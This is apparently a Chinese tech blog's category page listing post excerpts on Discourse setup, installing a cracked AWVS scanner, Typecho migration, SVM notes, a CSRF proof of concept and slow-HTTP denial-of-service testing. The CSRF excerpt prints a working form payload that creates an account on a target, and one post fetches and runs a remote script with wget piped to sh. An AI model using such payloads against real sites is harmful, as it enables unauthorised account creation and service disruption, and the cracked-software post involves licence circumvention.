分类 技术杂谈 下的文章

在本地搭建 discourse 社区

写在前面

有时候需要测试修改一些插件,如果直接在生产环境上面测试,会影响社区的正常运行,因此有必要在本地搭建一个 discourse 社区以供测试使用。

环境参数

  • 操作系统:Ubuntu 18.04.2 LTS x64
  • 内存:最低 1GB 推荐 2GB 以上

1.png

安装 Docker

2.png

wget -qO- https://get.docker.com/ | sh

- 阅读剩余部分 -

AWVS Linux 破解版在 Centos7 下安装过程中存在问题记录

AWVS Linux 破解版在 Centos7 下安装过程中存在问题记录

问题 1

运行 AWVS 安装程序时出现以下问题:

图片 1.png

Acunetix Installer Version: v_190703137, Copyright (c) Acunetix
------------------------------------------------------------
Checking os...
Checking for dependencies...
    - dependency libXrender.so.1 not found on the system
    - dependency libXext.so.6 not found on the system
    - dependency libcairo.so.2 not found on the system
    - dependency libXss.so.1 not found on the system
    - dependency libXcursor.so.1 not found on the system
    - dependency libXfixes.so.3 not found on the system
    - dependency libXcomposite.so.1 not found on the system
    - dependency libXrandr.so.2 not found on the system
    - dependency libpangocairo-1.0.so.0 not found on the system
    - dependency libXdamage.so.1 not found on the system
    - dependency libgdk-3.so.0 not found on the system
    - dependency libatspi.so.0 not found on the system
    - dependency libXtst.so.6 not found on the system
    - dependency libgtk-3.so.0 not found on the system
    - dependency libatk-bridge-2.0.so.0 not found on the system
    - dependency libgdk_pixbuf-2.0.so.0 not found on the system
    - dependency libatk-1.0.so.0 not found on the system
    - dependency libXi.so.6 not found on the system
    - dependency libpango-1.0.so.0 not found on the system
    - dependency libcups.so.2 not found on the system
Some dependencies are not found on the system. Aborting installation.
Aborting installation

- 阅读剩余部分 -

typecho搬家后出现的一些问题解决方法

起因

阿里云到期,不得已搬家了~
搬家的过程中,遇到一些问题,提供一些解决方法

1、出现"500Database Query Error"

config.inc.php 里面的55行左右的数据库类型Mysql改为Pdo_Mysql,
图片 1.png

2、出现"Error establishing a database connection"错误

  • 数据库服务是否运行
  • 是否启动了数据库服务
  • 数据库配置没有配置正确
  • 检查config.inc.php配置,看看config.inc.php中数据库配置是否正确,
  • 数据库版本太高(8.0以上就会出错)
    这是个巨坑,一开始我直接yum search mysql 然后找了一个版本的MySQL安装,结果发现是8.1版本的……当时就感觉不好,果然,无论怎么测试连接,都是出现Error establishing a database connection"错误,然后把这个版本的MySQL给卸载了,重新安装了5.7版本的MySQL,恢复正常。



- 阅读剩余部分 -

支持向量机SVM算法的学习记录

写在前面

本文是对于机器学习中SVM算法的一次学习记录,主要介绍SVM的原理和简单应用。通过自己实际操作去理解SVM。

一. 绪论

1.1 什么是机器学习

机器学习并没有准确的权威定义,但作为机器学习领域的先驱Arthur Samuel将机器学习非正式定义为:“在不直接针对问题进行编程的情况下,赋予计算机学习能力的一个研究领域。”

因此,我们可以简单的理解为,机器学习这门学科所关注的问题是计算机程序如何随着经验的积累自动提高性能。

1.2 分类算法

分类算法是数据挖掘同时也是机器学习的一个重要技术之一,其应用遍及社会各个领域。分类任务就是通过学习得到一个目标函数(通常也称作分类模型,即分类器),把每个属性集映射到一个预先定义的类标号。分类和回归都可以用于预测。和回归方法不同的是,分类的类标号是离散属性,而预测建模的回归的目标属性是连续的。

- 阅读剩余部分 -

CSRF漏洞中以form形式用POST方法提交json数据的POC

0x01 写在前面

今天遇到的,查了很多资料,发现这种形式的基本上没看到,圈子里某个师傅发了一个国外的链接,

参考了一下,最后成功构造poc。

0x02 POC

form提交post数据很简单,如下:

 <html>  
 <head>
    <title>This i a CSRF test!</title>
 </head>
 <form action="http://xxx.com/db/adds" method="post" enctype="text/plain" >  
<input name='{"attributes":{"name":"test3@test.com","userName":"test1","password":"e10adc3949ba59abbe56e057f20f883e","role":"user","status":"enabled", "phone":""}}'type='hidden'>  
 <input type=submit>  
 </form>  
 </html>

但是这种方式存在缺陷,如下图:
01.png


- 阅读剩余部分 -

缓慢的Http拒绝服务攻击漏洞的验证(slowhttptest的安装)

0x01 前言

主要记录缓慢的Http拒绝服务攻击漏洞的验证过程。

0x02 什么是Http拒绝服务攻击?

缓慢的http拒绝服务攻击是一种专门针对于Web的应用层拒绝服务攻击,攻击者操纵网络上的肉鸡,对目标Web服务器进行海量http request攻击,直到服务器带宽被打满,造成了拒绝服务。
慢速HTTP拒绝服务攻击经过不断的演变和发展,主要有三种攻击类型,分别是Slow headers、Slow body、Slow read。以Slow headers为例,Web应用在处理HTTP请求之前都要先接收完所有的HTTP头部,因为HTTP头部中包含了一些Web应用可能用到的重要的信息。攻击者利用这点,发起一个HTTP请求,一直不停的发送HTTP头部,消耗服务器的连接和内存资源。抓包数据可见,攻击客户端与服务器建立TCP连接后,每40秒才向服务器发送一个HTTP头部,而Web服务器再没接收到2个连续的rn时,会认为客户端没有发送完头部,而持续的等等客户端发送数据。如果恶意攻击者客户端持续建立这样的连接,那么服务器上可用的连接将一点一点被占满,从而导致拒绝服务。这种攻击类型称为慢速HTTP拒绝服务攻击。


- 阅读剩余部分 -